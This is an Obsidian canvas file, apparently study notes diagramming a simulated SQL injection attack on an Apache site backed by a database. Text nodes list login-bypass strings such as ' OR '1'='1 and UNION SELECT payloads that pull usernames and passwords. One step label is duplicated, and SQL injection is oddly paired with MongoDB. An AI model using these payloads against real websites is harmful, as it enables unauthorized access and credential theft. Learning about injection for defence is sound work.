{
	"edges":[
		{
			"fromNode":"d3f891ebf30626ae",
			"fromSide":"right",
			"id":"43a797e82394752a",
			"styleAttributes":{},
			"toNode":"b72dfabde1007a23",
			"toSide":"bottom"
		},
		{
			"fromNode":"d3f891ebf30626ae",
			"fromSide":"top",
			"id":"d4463f46ba45bfde",
			"styleAttributes":{},
			"toNode":"b72dfabde1007a23",
			"toSide":"left"
		},
		{
			"fromNode":"b72dfabde1007a23",
			"fromSide":"right",
			"id":"74529fb432d6405c",
			"styleAttributes":{},
			"toNode":"532e797fc856b7ea",
			"toSide":"top"
		},
		{
			"fromNode":"532e797fc856b7ea",
			"fromSide":"bottom",
			"id":"1be79a006d918836",
			"styleAttributes":{},
			"toNode":"d3f891ebf30626ae",
			"toSide":"bottom"
		}
	],
	"nodes":[
		{
			"color":"1",
			"height":2240,
			"id":"5205cf8e658c1e8f",
			"label":"SQLi Simulation",
			"styleAttributes":{},
			"type":"group",
			"width":2560,
			"x":-600,
			"y":-1240
		},
		{
			"color":"5",
			"file":"IMAGES/Pasted image 20250505225555.png",
			"height":400,
			"id":"d3f891ebf30626ae",
			"styleAttributes":{},
			"type":"file",
			"width":400,
			"x":-520,
			"y":320
		},
		{
			"color":"4",
			"file":"IMAGES/Pasted image 20250505225830.png",
			"height":400,
			"id":"b72dfabde1007a23",
			"styleAttributes":{},
			"type":"file",
			"width":400,
			"x":400,
			"y":-1080
		},
		{
			"height":180,
			"id":"3eb61464a41d67e1",
			"styleAttributes":{},
			"text":"**' UNION SELECT username, password FROM users --**\n**' UNION SELECT null, username || '~' || password FROM users --**\n**' UNION SELECT 1,2,3,4,table_name FROM information_schema.tables --**",
			"type":"text",
			"width":340,
			"x":-290,
			"y":-160
		},
		{
			"height":180,
			"id":"4047510ec6b18f71",
			"styleAttributes":{},
			"text":"' OR '1'='1\n' OR '1'='1' --\n' OR '1'='1' /*\nadmin' --\nadmin' #\n' OR 1=1 LIMIT 1;#",
			"type":"text",
			"width":200,
			"x":200,
			"y":-250
		},
		{
			"color":"4",
			"height":60,
			"id":"69f0c1c16fed7b44",
			"styleAttributes":{"textAlign":"center"},
			"text":"Apache Website",
			"type":"text",
			"width":400,
			"x":400,
			"y":-1140
		},
		{
			"color":"5",
			"height":60,
			"id":"fd663339775d89c0",
			"styleAttributes":{"textAlign":"center"},
			"text":"Attacker",
			"type":"text",
			"width":400,
			"x":-520,
			"y":260
		},
		{
			"height":160,
			"id":"28b98d00ca9f89d8",
			"styleAttributes":{"border":"dashed","shape":"circle","textAlign":"center"},
			"text":"# **3**",
			"type":"text",
			"width":175,
			"x":400,
			"y":575
		},
		{
			"height":160,
			"id":"2125addbab0e35f5",
			"styleAttributes":{"border":"dashed","shape":"circle","textAlign":"center"},
			"text":"# **1**",
			"type":"text",
			"width":175,
			"x":-465,
			"y":-710
		},
		{
			"height":130,
			"id":"92f06aa53c6b2476",
			"styleAttributes":{},
			"text":"# **Hacker identifies vulnerable, SQL driven website**",
			"type":"text",
			"width":324,
			"x":-269,
			"y":-695
		},
		{
			"color":"2",
			"file":"IMAGES/Pasted image 20250505225906.png",
			"height":400,
			"id":"532e797fc856b7ea",
			"styleAttributes":{},
			"type":"file",
			"width":400,
			"x":1360,
			"y":320
		},
		{
			"height":160,
			"id":"296b897db2af6bde",
			"styleAttributes":{"border":"dashed","shape":"circle","textAlign":"center"},
			"text":"# **2**",
			"type":"text",
			"width":175,
			"x":1240,
			"y":-695
		},
		{
			"height":120,
			"id":"f96c900b057debd7",
			"styleAttributes":{},
			"text":"# **Malicious SQL query is executed**",
			"type":"text",
			"width":324,
			"x":1436,
			"y":-680
		},
		{
			"height":130,
			"id":"52b07f877574292c",
			"styleAttributes":{},
			"text":"# **Hacker identifies vulnerable, SQL driven website**",
			"type":"text",
			"width":324,
			"x":596,
			"y":590
		},
		{
			"color":"2",
			"height":60,
			"id":"2522d9890b31ea2a",
			"styleAttributes":{"textAlign":"center"},
			"text":"MongoDB Server",
			"type":"text",
			"width":400,
			"x":1360,
			"y":260
		}
	]
}